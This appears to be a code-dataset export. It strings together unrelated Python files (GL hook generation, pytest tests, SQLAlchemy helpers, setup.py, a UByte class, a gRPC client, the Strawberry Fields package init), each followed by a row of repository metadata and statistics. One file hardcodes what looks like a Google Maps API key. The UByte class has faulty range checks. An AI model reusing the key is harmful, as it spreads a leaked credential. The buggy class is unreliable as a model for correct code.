// This file is autogenerated with gen_dispatch_table.py - any changes will be overwritten next time
// that script is run.
// $ ./gen_dispatch_table.py > gl_dispatch_table_defs.h
// We need to disable clang-format since this struct is programmatically generated
// clang-format off
'''.lstrip())
# Print the 'definitions' of these hooks - can be used for stringification or doing
# GetProcAddress style 'check name, return function'
print('#define ForEachSupported(FUNC) \\')
for hook in hooks:
print(' FUNC({}, {}); \\'.format(hook['name'], hook['name']))
for a in hook['aliases']:
print(' FUNC({}, {}); \\'.format(hook['name'], a))
print("\n\n\n")
# Print the actual definitions - used to forward into FuncWrapperN/AliasWrapperN to define exported
# hook implementations
print('#define DefineSupportedHooks() \\')
for hook in hooks:
typedef = typedefs[hook['typedef']]
num = len(typedef['args'])
arglist = ''
for arg in typedef['args']:
arglist += ', {}, {}'.format(arg[0], arg[1])
print(' FuncWrapper{}({}, {}{}); \\'.format(num, typedef['return'], hook['name'], arglist))
for a in hook['aliases']:
print(' AliasWrapper{}({}, {}, {}{}); \\'.format(num, typedef['return'], a, hook['name'], arglist))
print("\n\n\n")
print('#define ForEachUnsupported(FUNC) \\')
for typedef in typedefs.values():
# Don't print for functions we support, or wgl/etc functions
if typedef['used'] or typedef['function'][0:2] != 'gl':
continue
print(' FUNC({}); \\'.format(typedef['function']))
print("\n\n\n")
# For all typedefs not in the hooks, define them as unsupported
print('#define DefineUnsupportedHooks() \\')
for typedef in typedefs.values():
# Don't print for functions we support, or wgl/etc functions
if typedef['used'] or typedef['function'][0:2] != 'gl':
continue
num = len(typedef['args'])
arglist = ''
for arg in typedef['args']:
arglist += ', {}, {}'.format(arg[0], arg[1])
print(' UnsupportedWrapper{}({}, {}{}); \\'.format(num, typedef['return'], typedef['function'], arglist))
# Now generate wrapper macros
print('''
// the _renderdoc_hooked variants are to make sure we always have a function symbol exported that we
// can return from GetProcAddress. On posix systems if another library (or the application itself)
// creates a symbol called 'glEnable' we'll return the address of that, and break badly. Instead we
// leave the 'naked' versions for applications trying to import those symbols, and declare the
// _renderdoc_hooked for returning as a func pointer. The raw version calls directly into the hooked
// version to hopefully allow the linker to tail-call optimise and reduce the overhead.
''')
template = '''
#define FuncWrapper{num}(ret, function{macroargs}) \\
ret HOOK_CC CONCAT(function, _renderdoc_hooked)({argdecl}) \\
{{ \\
SCOPED_GLCALL(function); \\
UNINIT_CALL(function, {argpass}); \\
return glhook.driver->function({argpass}); \\
}} \\
HOOK_EXPORT ret HOOK_CC function({argdecl}) \\
{{ \\
return CONCAT(function, _renderdoc_hooked)({argpass}); \\
}}
#define AliasWrapper{num}(ret, function, realfunc{macroargs}) \\
ret HOOK_CC CONCAT(function, _renderdoc_hooked)({argdecl}) \\
{{ \\
SCOPED_GLCALL(function); \\
UNINIT_CALL(realfunc, {argpass}); \\
return glhook.driver->realfunc({argpass}); \\
}} \\
HOOK_EXPORT ret HOOK_CC function({argdecl}) \\
{{ \\
return CONCAT(function, _renderdoc_hooked)({argpass}); \\
}}
#define UnsupportedWrapper{num}(ret, function{macroargs}) \\
typedef ret(HOOK_CC *CONCAT(function, _hooktype))({argdecl}); \\
CONCAT(function, _hooktype) CONCAT(unsupported_real_, function) = NULL; \\
ret HOOK_CC CONCAT(function, _renderdoc_hooked)({argdecl}) \\
{{ \\
static bool hit = false; \\
if(hit == false) \\
{{ \\
RDCERR("Function " STRINGIZE(function) " not supported - capture may be broken"); \\
hit = true; \\
}} \\
if(!CONCAT(unsupported_real_, function)) \\
CONCAT(unsupported_real_, function) = \\
(CONCAT(function, _hooktype))glhook.GetUnsupportedFunction(STRINGIZE(function)); \\
return CONCAT(unsupported_real_, function)({argpass}); \\
}} \\
HOOK_EXPORT ret HOOK_CC function({argdecl}) \\
{{ \\
return CONCAT(function, _renderdoc_hooked)({argpass}); \\
}}
'''
for num in range(parsed_args.maxparam+1):
macroargs = ', '.join([('t{0}, p{0}'.format(n+1)) for n in range(num)])
argdecl = ', '.join([('t{0} p{0}'.format(n+1)) for n in range(num)])
argpass = ', '.join([('p{0}'.format(n+1)) for n in range(num)])
macroargs = ', ' + macroargs if num > 0 else macroargs
print(template.format(num=num, macroargs=macroargs,
argdecl=argdecl, argpass=argpass))
| 37.112727 | 125 | 0.670194 | 1,399 | 10,206 | 4.834167 | 0.290207 | 0.013308 | 0.009315 | 0.025728 | 0.200503 | 0.167973 | 0.142245 | 0.142245 | 0.132633 | 0.132633 | 0 | 0.006555 | 0.162943 | 10,206 | 274 | 126 | 37.248175 | 0.785087 | 0.195081 | 0 | 0.293785 | 1 | 0.022599 | 0.607021 | 0.146771 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.056497 | 0.033898 | 0 | 0.067797 | 0.090395 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
e4032fc7a4f1165ee96e2fa2801c14806f967050 | 1,753 | py | Python | tests/test_sequence.py | ontruck/pyontruck | 011480c6e6fc6a479c10105bf160e0b5008b4508 | [
"BSD-3-Clause"
] | null | null | null | tests/test_sequence.py | ontruck/pyontruck | 011480c6e6fc6a479c10105bf160e0b5008b4508 | [
"BSD-3-Clause"
] | null | null | null | tests/test_sequence.py | ontruck/pyontruck | 011480c6e6fc6a479c10105bf160e0b5008b4508 | [
"BSD-3-Clause"
] | null | null | null | """
test_pyontruck
----------------------------------
Tests for `pyontruck.sequence` module.
"""
import pytest
from pytest_cases import pytest_parametrize_plus, fixture_ref
from pyontruck.sequence import remove_duplicates, clean_nones
@pytest.fixture
def list_without_duplicates():
return [1, 2, 3, 4, 5, 'a', 'e', 'i', 'o', 'u']
@pytest.fixture
def list_with_duplicates():
return [1, 2, 3, 4, 5, 'a', 'e', 'i', 'o', 'u', 1, 2, 3, 4, 5]
@pytest.fixture
def none_list():
return [None, None, None]
@pytest.fixture
def list_without_duplicates_and_nones(list_without_duplicates, none_list):
return list_without_duplicates + none_list
# If you want to use fixtures as parametrize arguments, need pytest_cases extension
# Ref: https://stackoverflow.com/questions/42228895/how-to-parametrize-a-pytest-fixture/56871701#56871701
@pytest_parametrize_plus("expected_list, list_to_test", [
(fixture_ref(list_without_duplicates), fixture_ref(list_without_duplicates)),
([], fixture_ref(none_list)),
(fixture_ref(list_without_duplicates), fixture_ref(list_without_duplicates_and_nones))
])
def test_clean_nones(expected_list, list_to_test):
assert expected_list == clean_nones(list_to_test)
def test_clean_nones_error():
with pytest.raises(TypeError):
clean_nones(1)
@pytest_parametrize_plus("expected_list, list_to_test", [
(fixture_ref(list_without_duplicates), fixture_ref(list_without_duplicates)),
(fixture_ref(list_without_duplicates), fixture_ref(list_with_duplicates))
])
def test_remove_duplicates(expected_list, list_to_test):
assert expected_list == remove_duplicates(list_to_test)
def test_remove_duplicates_errors():
with pytest.raises(TypeError):
remove_duplicates(1)
| 29.711864 | 105 | 0.749572 | 240 | 1,753 | 5.1125 | 0.241667 | 0.098615 | 0.188264 | 0.119804 | 0.518337 | 0.426243 | 0.374083 | 0.374083 | 0.308883 | 0.308883 | 0 | 0.026589 | 0.120365 | 1,753 | 58 | 106 | 30.224138 | 0.769131 | 0.156874 | 0 | 0.352941 | 0 | 0 | 0.043597 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 1 | 0.235294 | false | 0 | 0.088235 | 0.117647 | 0.441176 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
7c0f1635614373159d3dca9a81f67c150e8ff961 | 998 | py | Python | nomenclateAPI/models/common.py | AndresMWeber/nomenclate-api | 1a098918ce54bb6083bd001780de21b27a2669eb | [
"MIT"
] | null | null | null | nomenclateAPI/models/common.py | AndresMWeber/nomenclate-api | 1a098918ce54bb6083bd001780de21b27a2669eb | [
"MIT"
] | null | null | null | nomenclateAPI/models/common.py | AndresMWeber/nomenclate-api | 1a098918ce54bb6083bd001780de21b27a2669eb | [
"MIT"
] | null | null | null | from db import db
class CommonMixin(object):
serial_attrs = []
id = db.Column(db.Integer, primary_key=True)
def json(self):
return {attr: getattr(self, attr) for attr in self.serial_attrs}
@classmethod
def find_all_by_id(cls, _id):
return cls.query.filter_by(id=_id).all()
@classmethod
def find_by_name(cls, name):
return cls.query.filter_by(name=name).first()
@classmethod
def find_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
@classmethod
def find_by_key_value(cls, key, value):
return cls.query.filter_by(**{key: value}).first()
@classmethod
def find_by_kwargs(cls, **kwargs):
return cls.query.filter_by(**kwargs).first()
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
@classmethod
def find_all(cls):
return cls.query.all() | 24.341463 | 72 | 0.635271 | 141 | 998 | 4.29078 | 0.276596 | 0.138843 | 0.178512 | 0.165289 | 0.345455 | 0.115702 | 0.115702 | 0.115702 | 0.115702 | 0.115702 | 0 | 0 | 0.238477 | 998 | 41 | 73 | 24.341463 | 0.796053 | 0 | 0 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.033333 | 0.233333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
7c122b8ad9d7fffc509870b0695f2d966d7bc77e | 326 | py | Python | data/project_data.py | OlgaKuratkina/training_mantis | 3886498ca1efd56ccc37b63bdcce5b4bb2a92611 | [
"Apache-2.0"
] | null | null | null | data/project_data.py | OlgaKuratkina/training_mantis | 3886498ca1efd56ccc37b63bdcce5b4bb2a92611 | [
"Apache-2.0"
] | null | null | null | data/project_data.py | OlgaKuratkina/training_mantis | 3886498ca1efd56ccc37b63bdcce5b4bb2a92611 | [
"Apache-2.0"
] | null | null | null | from model.project import Project
import random
import string
symb = string.ascii_letters + string.digits + " "*10
projects = [Project(name="".join([random.choice(symb) for i in range(10)]), description="Its a project about something")]
#projects = [Project(name="lksuu67jk", description="Its a project about something")]
| 29.636364 | 121 | 0.742331 | 44 | 326 | 5.477273 | 0.568182 | 0.107884 | 0.157676 | 0.182573 | 0.298755 | 0.298755 | 0 | 0 | 0 | 0 | 0 | 0.020979 | 0.122699 | 326 | 10 | 122 | 32.6 | 0.821678 | 0.254601 | 0 | 0 | 0 | 0 | 0.124481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7c1e65bc8b9e89683a49f7612d71c52b25e263ec | 334 | py | Python | scikits/gpu/tests/test_texture.py | stefanv/scikits.gpu | d57a676e16ed576a255a1a4cae64d8c019f0e8fb | [
"MIT"
] | 4 | 2016-05-08T21:41:10.000Z | 2021-09-13T18:32:28.000Z | scikits/gpu/tests/test_texture.py | stefanv/scikits.gpu | d57a676e16ed576a255a1a4cae64d8c019f0e8fb | [
"MIT"
] | null | null | null | scikits/gpu/tests/test_texture.py | stefanv/scikits.gpu | d57a676e16ed576a255a1a4cae64d8c019f0e8fb | [
"MIT"
] | null | null | null | from nose.tools import *
from scikits.gpu.texture import *
import pyglet.gl as gl
def test_creation():
Texture(20, 20)
Texture(20, 25)
#def test_texture_target():
# assert_equal(texture_target(16, 16), gl.GL_TEXTURE_2D)
# assert texture_target(17, 16) in \
# [gl.GL_TEXTURE_2D, gl.GL_TEXTURE_RECTANGLE_ARB]
| 23.857143 | 59 | 0.706587 | 52 | 334 | 4.288462 | 0.461538 | 0.174888 | 0.147982 | 0.116592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065693 | 0.179641 | 334 | 13 | 60 | 25.692308 | 0.748175 | 0.538922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.5 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7c2b7e4ce33658efffeb0e2974a33e636c1e1aea | 1,434 | py | Python | setup.py | cloverly/cloverly-python-module | 773736db6713919c80be288a7875f41c37feaeba | [
"MIT"
] | 1 | 2021-08-10T02:54:19.000Z | 2021-08-10T02:54:19.000Z | setup.py | cloverly/cloverly-python-module | 773736db6713919c80be288a7875f41c37feaeba | [
"MIT"
] | null | null | null | setup.py | cloverly/cloverly-python-module | 773736db6713919c80be288a7875f41c37feaeba | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
VERSION = '0.7.0'
DESCRIPTION = 'Cloverly API Module for Python'
LONG_DESCRIPTION = """
The Cloverly Python Module is a wrapper around the python requests library.
It can be used to create, edit and delete cloverly resources, including, but not
limited to: Offsets, Estimates and Purchases.
"""
# Setting up
setup(
name="cloverly-python-module",
version=VERSION,
author="Zain Lakhani",
author_email="<zain@cloverly.com>",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
url="https://github.com/cloverly/cloverly-python-module",
packages=find_packages(),
install_requires=['requests'],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| 35.85 | 80 | 0.652022 | 153 | 1,434 | 6.065359 | 0.503268 | 0.184267 | 0.242457 | 0.168103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016158 | 0.223152 | 1,434 | 39 | 81 | 36.769231 | 0.816876 | 0.006974 | 0 | 0 | 0 | 0 | 0.632208 | 0.015471 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027778 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c660362bd86d54e55b09a0d04bbaaef9536a2cd | 128 | py | Python | googleGeolocation.py | jacobhjustice/AuburnHacks19 | 24402cd44859204923a050c33539cf6b4f820463 | [
"MIT"
] | null | null | null | googleGeolocation.py | jacobhjustice/AuburnHacks19 | 24402cd44859204923a050c33539cf6b4f820463 | [
"MIT"
] | 9 | 2020-09-04T14:33:05.000Z | 2022-03-02T03:08:22.000Z | googleGeolocation.py | jacobhjustice/AuburnHacks19 | 24402cd44859204923a050c33539cf6b4f820463 | [
"MIT"
] | 1 | 2019-02-02T21:10:02.000Z | 2019-02-02T21:10:02.000Z | import requests, googlemaps
gmaps = googlemaps.Client(key='AIzaSyC_pk-16CSjVdRBLL9FzIMfkeP0buthiqY')
print (gmaps.geolocate()) | 25.6 | 72 | 0.820313 | 13 | 128 | 8 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033613 | 0.070313 | 128 | 5 | 73 | 25.6 | 0.840336 | 0 | 0 | 0 | 0 | 0 | 0.302326 | 0.302326 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
7c7b3ee49133f635d6c1a4bdebc0f3830d1d9f8d | 158 | py | Python | 17/04/0.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | 17/04/0.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | 70 | 2017-06-01T11:02:51.000Z | 2017-06-30T00:35:32.000Z | 17/04/0.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | class MyClass:
def __init__(self):
self.var = 'var'
def method(self):
print('method')
x = MyClass()
x.method()
m = x.method
m()
| 13.166667 | 24 | 0.537975 | 21 | 158 | 3.857143 | 0.47619 | 0.17284 | 0.197531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.303797 | 158 | 11 | 25 | 14.363636 | 0.736364 | 0 | 0 | 0 | 0 | 0 | 0.056962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c87dba46cef31b7285fa96947e44ef5815e676f | 2,434 | py | Python | tests/test_types.py | heitorpolidoro/polidoro-sqlite-utils | 61ab08d3677b8eea6d98f7e52e39aae52ab41ccb | [
"MIT"
] | null | null | null | tests/test_types.py | heitorpolidoro/polidoro-sqlite-utils | 61ab08d3677b8eea6d98f7e52e39aae52ab41ccb | [
"MIT"
] | null | null | null | tests/test_types.py | heitorpolidoro/polidoro-sqlite-utils | 61ab08d3677b8eea6d98f7e52e39aae52ab41ccb | [
"MIT"
] | null | null | null | from datetime import datetime, time, date
from polidoro_sqlite_utils.types import FloatField, TextField, IntegerField, DatetimeField, TimeField, DateField, \
ForeignKey
from tests.model_test import ModelTest
_now = datetime.now()
def _assert_field_value_and_type(field, field_type, input_value, expected_value):
value = field.parse(input_value)
assert isinstance(value, field_type)
assert expected_value == value
def test_float_field_parse():
_assert_field_value_and_type(FloatField(), float, '1.006', 1.01)
_assert_field_value_and_type(FloatField(precision=3), float, '1.006', 1.006)
def test_integer_field_parse():
_assert_field_value_and_type(IntegerField(), int, '123', 123)
def test_text_field_parse():
_assert_field_value_and_type(TextField(), str, 1.006, '1.006')
def test_datetime_field_parse():
_assert_field_value_and_type(DatetimeField(), datetime, _now, _now)
_assert_field_value_and_type(DatetimeField(), datetime, '2020-02-02 20:02:20', datetime(2020, 2, 2, 20, 2, 20))
# with data format
_assert_field_value_and_type(
DatetimeField(format='%H:%M %d/%m/%y'), datetime, '4:5 1/2/03', datetime(2003, 2, 1, 4, 5)
)
# with dateutil parse arguments
_assert_field_value_and_type(
DatetimeField(dayfirst=True, null=True), datetime, '4:5 01-02-03', datetime(2003, 2, 1, 4, 5)
)
def test_time_field_parse():
_assert_field_value_and_type(TimeField(), time, _now.time(), _now.time())
# with default format '%H:%M'
_assert_field_value_and_type(TimeField(), time, '14:20', time(14, 20))
# with different format
_assert_field_value_and_type(TimeField(format='%M<>%H'), time, '20<>14', time(14, 20))
def test_date_field_parse():
_assert_field_value_and_type(DateField(), date, _now.date(), _now.date())
_assert_field_value_and_type(DateField(), date, '2020-02-02', datetime(2020, 2, 2).date())
# with data format
_assert_field_value_and_type(DateField(format='%d/%m/%y'), date, '1/2/03', datetime(2003, 2, 1).date())
# with dateutil parse arguments
_assert_field_value_and_type(DateField(dayfirst=True, null=True), date, '01-02-03', datetime(2003, 2, 1).date())
def test_foreignkey_field_parse():
_assert_field_value_and_type(ForeignKey(ModelTest), ModelTest, ModelTest(id=1), ModelTest(id=1))
_assert_field_value_and_type(ForeignKey(ModelTest), ModelTest, '1', ModelTest(id=1))
| 35.794118 | 116 | 0.725965 | 359 | 2,434 | 4.568245 | 0.183844 | 0.120732 | 0.17561 | 0.208537 | 0.555488 | 0.541463 | 0.442073 | 0.167073 | 0.059756 | 0 | 0 | 0.067175 | 0.137634 | 2,434 | 67 | 117 | 36.328358 | 0.71415 | 0.058751 | 0 | 0.054054 | 0 | 0 | 0.053853 | 0 | 0 | 0 | 0 | 0 | 0.540541 | 1 | 0.216216 | false | 0 | 0.081081 | 0 | 0.297297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c8d4b1a04813257d53dd258535528e65b1899f6 | 1,711 | py | Python | number_types/ubyte.py | HTG-YT/integral-types | c4ce6523fd14a3c58e0e3394de27221d5b0af444 | [
"MIT"
] | null | null | null | number_types/ubyte.py | HTG-YT/integral-types | c4ce6523fd14a3c58e0e3394de27221d5b0af444 | [
"MIT"
] | null | null | null | number_types/ubyte.py | HTG-YT/integral-types | c4ce6523fd14a3c58e0e3394de27221d5b0af444 | [
"MIT"
] | null | null | null | from number_types.errors import *
class UByte:
"""
Class: UByte
Description:
Represents an unsigned 8-bit integer.
"""
def __init__(self, value):
self.value: UByte = value
if value in range(0, 255):
pass
else:
if value > 0:
raise ValueOverflowException(f"The value supplied ({value}) is bigger than 255 (UByte).")
elif value < 255:
raise ValueUnderflowException(f"The value supplied ({value}) is smaller than 0 (UByte).")
def __add__(self, other):
return UByte(value=(self.value + other))
def __sub__(self, other):
return UByte(value=(self.value - other))
def __mul__(self, other):
return UByte(value=(self.value * other))
def __floordiv__(self, other):
return UByte(value=(self.value // other))
def __truediv__(self, other):
return UByte(value=(self.value / other))
def __mod__(self, other):
return UByte(value=(self.value % other))
def __pow__(self, other):
return UByte(value=(self.value ** other))
def compare_to(self, value):
return self.value - value
def equals(self, value) -> bool:
return self.value == value
@classmethod
def parse(cls, value: str):
return UByte(int(value))
def to_string(self) -> str:
return str(self.value)
@classmethod
def try_parse(cls, value: str, expected_output) -> bool:
try:
if cls.parse(value=value) == expected_output:
return True
except Exception as exception:
return False
| 26.734375 | 106 | 0.568673 | 195 | 1,711 | 4.794872 | 0.323077 | 0.134759 | 0.119786 | 0.149733 | 0.365775 | 0.365775 | 0.314439 | 0.314439 | 0.314439 | 0 | 0 | 0.011265 | 0.325541 | 1,711 | 63 | 107 | 27.15873 | 0.79896 | 0.039743 | 0 | 0.04878 | 0 | 0 | 0.071337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.317073 | false | 0.02439 | 0.02439 | 0.268293 | 0.682927 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c8fddfbc50162db9396fa1b0530e68015ee68f5 | 248 | py | Python | GameServer/Servers/PMSProxyServer/DBSession.py | kedlly/XDFramework | 2e8e270acf200e8b9762b017e8f2e6683db44af1 | [
"MIT"
] | 1 | 2018-09-10T10:37:36.000Z | 2018-09-10T10:37:36.000Z | GameServer/Servers/PMSProxyServer/DBSession.py | kedlly/XDFramework | 2e8e270acf200e8b9762b017e8f2e6683db44af1 | [
"MIT"
] | null | null | null | GameServer/Servers/PMSProxyServer/DBSession.py | kedlly/XDFramework | 2e8e270acf200e8b9762b017e8f2e6683db44af1 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, Integer, String, create_engine, Date, Boolean
from sqlalchemy.orm import sessionmaker
from Configure import DATA_SOURCE_NAME
engine = create_engine(DATA_SOURCE_NAME, echo=False)
DBSession = sessionmaker(bind=engine) | 35.428571 | 76 | 0.83871 | 33 | 248 | 6.121212 | 0.606061 | 0.138614 | 0.138614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100806 | 248 | 7 | 77 | 35.428571 | 0.90583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7c94079aa5754ba06912f692bf0d73a4271dceeb | 431 | py | Python | vegaapiclient/vegacoreclient.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | 1 | 2022-01-10T01:20:21.000Z | 2022-01-10T01:20:21.000Z | vegaapiclient/vegacoreclient.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | 8 | 2021-10-01T12:54:27.000Z | 2022-03-24T12:22:40.000Z | vegaapiclient/vegacoreclient.py | vegaprotocol/sdk-python | 2491f62704afd806a47cb8467a7edf0dd65bbf1b | [
"MIT"
] | null | null | null | from .generated.vega.api.v1 import core_grpc
from .grpcclient import GRPCClient
class VegaCoreClient(GRPCClient):
"""
The Vega Core Client talks to a back-end node.
"""
def __init__(self, url: str, channel=None) -> None:
super().__init__(url, channel=channel)
self._core = core_grpc.CoreServiceStub(self.channel)
def __getattr__(self, funcname):
return getattr(self._core, funcname)
| 26.9375 | 60 | 0.691415 | 54 | 431 | 5.222222 | 0.574074 | 0.056738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002907 | 0.201856 | 431 | 15 | 61 | 28.733333 | 0.81686 | 0.106729 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.125 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
7ca3b8c10d94675346f932a8c465ef35595f4e1f | 2,734 | py | Python | strawberryfields/__init__.py | NunoEdgarGFlowHub/strawberryfields | 0cfef1055f782e1c338d27fb9a17e32c542ca2eb | [
"Apache-2.0"
] | 1 | 2018-12-20T03:12:39.000Z | 2018-12-20T03:12:39.000Z | strawberryfields/__init__.py | NunoEdgarGFlowHub/strawberryfields | 0cfef1055f782e1c338d27fb9a17e32c542ca2eb | [
"Apache-2.0"
] | null | null | null | strawberryfields/__init__.py | NunoEdgarGFlowHub/strawberryfields | 0cfef1055f782e1c338d27fb9a17e32c542ca2eb | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. _code:
Overview
==================
.. image:: ../_static/sfcomponents.svg
:align: center
:width: 90%
:target: javascript:void(0);
|
The Strawberry Fields codebase includes a number of complementary components.
These can be separated into frontend components (:file:`engine.py`, :file:`ops.py`,
and :file:`utils.py`) and backend components (all found within the :file:`strawberryfields.backends` submodule).
Software components
-------------------
**Frontend:**
* Quantum compiler engine: :mod:`strawberryfields.engine`
* Quantum operations: :mod:`strawberryfields.ops`
* Utilities: :mod:`strawberryfields.utils`
**Backend:**
* Backend API: :mod:`strawberryfields.backends.base`
* Quantum states: :mod:`strawberryfields.backends.states`
* Fock simulator backend: :mod:`strawberryfields.backends.fockbackend`
* Gaussian simulator backend: :mod:`strawberryfields.backends.gaussianbackend`
* Tensorflow simulator backend: :mod:`strawberryfields.backends.tfbackend`
Top-level functions
-------------------
.. autosummary::
Engine
convert
version
Code details
~~~~~~~~~~~~
"""
from __future__ import unicode_literals
from ._version import __version__
from .engine import Engine as _Engine
from .engine import _convert as convert
__all__ = ['Engine', 'convert', 'version']
def version():
r"""
Version number of Strawberry Fields.
Returns:
str: package version number
"""
return __version__
def Engine(num_subsystems, **kwargs):
r"""
